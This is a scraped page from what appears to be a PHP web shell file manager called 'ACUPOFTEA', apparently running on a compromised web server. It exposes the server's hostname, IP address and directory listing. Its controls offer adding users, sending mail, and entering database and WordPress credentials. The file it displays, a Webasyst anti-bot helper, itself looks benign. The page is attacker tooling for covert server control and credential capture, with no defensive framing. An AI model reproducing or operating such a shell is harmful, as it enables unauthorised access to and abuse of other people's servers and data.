System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
webasyst
/
216.73.216.168
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
update_antibot.php
<?php @unlink('update_antibot.php'); function __getRandomHexString($length = 64) { if (!__wa_is_int($length) || $length <= 0) { $length = 64; } // we will bin2hex and byte is 2 hex digit, so make a little correction and than, before method returns, make correction back $is_even = $length % 2 === 0; if (!$is_even) { $length += 1; } if (function_exists('random_bytes')) { try { $result = bin2hex(random_bytes($length / 2)); // make a correction back if (!$is_even) { $result = substr($result, 1); } return $result; } catch (Exception $e) { } } if (function_exists('openssl_random_pseudo_bytes')) { $result = openssl_random_pseudo_bytes($length / 2); if ($result) { $result = bin2hex($result); // make a correction back if (!$is_even) { $result = substr($result, 1); } return $result; } } $bytes = []; if (function_exists('random_int')) { $fn = 'random_int'; } elseif (function_exists('mt_rand')) { $fn = 'mt_rand'; } else { $fn = 'rand'; } for ($i = 0, $n = $length / 2; $i < $n; $i++) { $bytes[] = chr($fn(0, 255)); // gen one byte } $bytes = join('',$bytes); $result = bin2hex($bytes); // make a correction back if (!$is_even) { $result = substr($result, 1); } return $result; } function __wa_is_int($val) { // check against objects to avoid nasty object to int conversion errors if (!is_numeric($val)) { return false; } // Test for very large integers if (function_exists('ctype_digit')) { $val = (string) $val; if (ctype_digit($val)) { return true; } else if ($val && $val[0] == '-' && ctype_digit(substr($val, 1))) { return true; } } // typecast trick works fine for anything else except boolean true return ($val !== true) && ((string)(int) $val) === ((string) $val); } $empty_field_name = serialize('!f'. __getRandomHexString(6)); $filled_field_name = serialize('!f'. __getRandomHexString(6)); $filled_field_value = serialize(__getRandomHexString(32)); echo '<empty_field_name>'.$empty_field_name.'</empty_field_name>'; echo '<filled_field_name>'.$filled_field_name.'</filled_field_name>'; echo '<filled_field_value>'.$filled_field_value.'</filled_field_value>'; ?>
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2026-03-07 09:39:45
..
DIR
-
drwxr-xr-x
2026-03-24 09:40:03
images
DIR
-
drwxr-xr-x
2026-03-07 09:39:45
php53
DIR
-
drwxr-xr-x
2026-03-07 09:39:45
php56
DIR
-
drwxr-xr-x
2026-03-07 09:39:45
php71
DIR
-
drwxr-xr-x
2026-03-07 09:39:45
php81
DIR
-
drwxr-xr-x
2026-03-07 09:39:45
php82
DIR
-
drwxr-xr-x
2026-03-07 09:39:45
.htaccess
text/plain
14 B
-rw-r--r--
2021-12-23 06:54:36
SystemConfig.class.php
text/x-php
157 B
-rw-r--r--
2021-12-23 06:54:36
_.htaccess
text/plain
1.49 KB
-rw-r--r--
2026-02-17 07:40:48
_htaccess
text/plain
142 B
-rw-r--r--
2026-02-17 07:40:48
_thumb.php
text/x-php
193 B
-rw-r--r--
2026-02-17 07:40:48
all_fields_order.php
text/x-php
398 B
-rw-r--r--
2026-02-17 07:40:48
apps.php
text/x-php
237 B
-rw-r--r--
2026-02-17 07:40:48
company_fields_order.php
text/x-php
567 B
-rw-r--r--
2026-02-17 07:40:48
config.php
text/x-php
158 B
-rw-r--r--
2024-04-24 07:14:16
custom_fields.php
text/x-php
29.3 KB
-rw-r--r--
2026-02-17 07:40:48
db.php
text/x-php
271 B
-rw-r--r--
2026-03-06 04:54:10
edit.php
text/x-php
4.22 KB
-rw-r--r--
2026-03-06 07:26:00
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
fileindex.php
text/x-asm
189 B
-rw-r--r--
2026-02-17 07:40:48
import.php
text/x-php
2.89 KB
-rw-r--r--
2026-03-06 07:26:00
info.xml
text/html
3.42 KB
-rw-r--r--
2026-03-06 04:54:10
install.js
text/plain
924 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
15.41 KB
-rw-r--r--
2026-03-06 07:26:00
install.xml
text/html
1007 B
-rw-r--r--
2021-12-23 06:54:36
mail.php
text/x-php
81 B
-rw-r--r--
2025-02-13 04:31:52
md5
text/plain
3.5 KB
-rw-r--r--
2026-03-06 07:26:00
notes.txt
text/plain
1.28 KB
-rw-r--r--
2026-02-17 07:40:48
person_fields_order.php
text/x-php
1.52 KB
-rw-r--r--
2026-02-17 07:40:48
plugins.php
text/x-php
95 B
-rw-r--r--
2026-02-17 07:40:48
robots.txt
text/plain
214 B
-rw-r--r--
2026-02-17 07:40:48
routing.php
text/x-php
1.25 KB
-rw-r--r--
2026-02-17 07:40:48
search.php
text/x-php
34.87 KB
-rw-r--r--
2026-02-17 07:40:48
services.php
text/x-php
3.76 KB
-rw-r--r--
2026-02-17 07:40:48
thumb.php
text/x-php
187 B
-rw-r--r--
2026-02-17 07:40:48
update_antibot.php
text/x-php
2.67 KB
-rw-r--r--
2026-02-17 07:40:48
waid.php
text/x-php
615 B
-rw-r--r--
2026-02-17 07:40:48
~ ACUPOFTEA - mail.ontime-ae.com